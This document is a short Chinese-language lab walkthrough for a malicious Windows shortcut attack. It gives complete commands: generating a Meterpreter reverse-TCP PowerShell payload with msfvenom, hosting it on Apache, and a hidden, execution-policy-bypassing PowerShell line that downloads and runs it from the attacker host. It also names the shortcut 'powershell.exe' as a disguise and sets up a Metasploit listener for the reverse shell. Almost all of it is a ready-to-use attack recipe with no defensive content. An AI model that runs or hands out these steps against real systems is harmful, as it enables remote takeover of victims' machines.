利用原理:
创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。
环境搭建:
攻击机:kali ip:10.0.0.140
目标靶机:win2008r2x64 ip:192.168.99.104
1.kali下生成一个反弹的 ps1的shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.0.140 lport=5555 -f psh-reflection>/opt/search.ps1
2.切换到opt目录,然后查看到已生成了search.ps1 的powershell 后门
cd /opt
ls
3.将生成的search.ps1拷贝到/var/www/html目录下
mv search.ps1 /var/www/html
ls
4.启动apache服务
service apache2 start
5.访问web下的search.ps1,可以直接访问:
6.在靶机上创建一个powershell远程快捷:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.140/search.ps1');test.ps1"
7.名称为:powershell.exe
8.kali下创建监听反弹,并且可以看到成功反弹出靶机的shell:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.0.0.140
set lport 5555
exploit